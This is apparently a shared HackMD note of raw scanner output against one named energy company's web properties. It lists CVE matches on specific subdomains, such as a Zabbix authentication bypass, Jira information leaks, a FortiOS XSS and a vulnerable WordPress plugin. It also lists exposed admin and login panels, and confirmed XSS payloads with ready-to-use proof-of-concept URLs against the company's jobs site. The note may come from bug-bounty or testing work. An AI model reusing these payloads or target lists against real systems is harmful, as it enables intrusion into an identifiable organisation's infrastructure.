HackMD - Collaborative Markdown Knowledge Base

## cve [cve-2020-14179] [http] [medium] https://jira.den.eon.com/secure/QueryComponent!Default.jspa [cve-2019-17382] [http] [critical] https://hub.eon.com/zabbix.php?action=dashboard.view&dashboardid=1 [cve-2020-14179] [http] [medium] https://jira.dev.eon.com/secure/QueryComponent!Default.jspa [cve-2018-13380] [http] [medium] https://flows.dev3.iot.eon.com/message?title=x&msg=%26%23<svg/onload=alert(1337)> [cve-2018-13380] [http] [medium] https://flows.dev2.iot.eon.com/message?title=x&msg=%26%23<svg/onload=alert(1337)> [cve-2018-13380] [http] [medium] https://flows.iot.eon.com/message?title=x&msg=%26%23<svg/onload=alert(1337)> [cve-2018-13380] [http] [medium] https://flows.dev.iot.eon.com/message?title=x&msg=%26%23<svg/onload=alert(1337)> [cve-2020-14181] [http] [medium] https://jira.dev.eon.com/secure/ViewUserHover.jspa [cve-2020-14181] [http] [medium] https://jira.dev-pre-prod.eon.com/secure/ViewUserHover.jspa [cve-2019-15858] [http] [high] https://esport.eon.com/wp-content/plugins/insert-php/readme.txt [cve-2019-15858] [http] [high] https://e-sports.eon.com/wp-content/plugins/insert-php/readme.txt [cve-2019-15858] [http] [high] https://www.e-sport.eon.com/wp-content/plugins/insert-php/readme.txt [cve-2019-15858] [http] [high] https://esports.eon.com/wp-content/plugins/insert-php/readme.txt [cve-2019-15858] [http] [high] https://www.esports.eon.com/wp-content/plugins/insert-php/readme.txt [cve-2019-15858] [http] [high] https://www.esport.eon.com/wp-content/plugins/insert-php/readme.txt [cve-2019-15858] [http] [high] https://www.e-sports.eon.com/wp-content/plugins/insert-php/readme.txt [cve-2019-15858] [http] [high] https://e-sport.eon.com/wp-content/plugins/insert-php/readme.txt ## PANELS [mobileiron-login] [http] https://qa-mobility.eon.com/mifs/user/login.jsp [mobileiron-login] [http] https://qa-mobility.eon.com/mifs/c/d/android.html [mobileiron-login] [http] https://mic.eon.com/mifs/user/login.jsp [mobileiron-login] [http] https://mic.eon.com/mifs/c/d/android.html [mobileiron-login] [http] https://mobility.eon.com/mifs/user/login.jsp [mobileiron-login] [http] https://mobility.eon.com/mifs/c/d/android.html [swagger-panel] [http] [info] https://api.cbms.iot.eon.com/swagger-ui.html (3) [citrix-adc-gateway-panel] [http] [info] https://iwp.eon.com/logon/LogonPoint/index.html crxde] [http] [info] https://p1-editor.eon.com/crx/de/index.jsp (15+) ## XSS [V] Triggered XSS Payload (found DOM Object): catid='"><svg/class=dalfox onload=&#97&#108&#101&#114&#00116&#40&#41&#x2f&#x2f [POC][V][GET] https://jobs.eon.com/services/rss/category/?catid=3727801%27%22%3E%3Csvg%2Fclass%3Ddalfox+onload%3D%26%2397%26%23108%26%23101%26%23114%26%2300116%26%2340%26%2341%26%23x2f%26%23x2f [V] Triggered XSS Payload (found DOM Object): catid='><svg/class='dalfox'onLoad=alert(45)> [POC][V][GET] https://jobs.eon.com/services/rss/category/?catid=3728401%27%3E%3Csvg%2Fclass%3D%27dalfox%27onLoad%3Dalert%2845%29%3E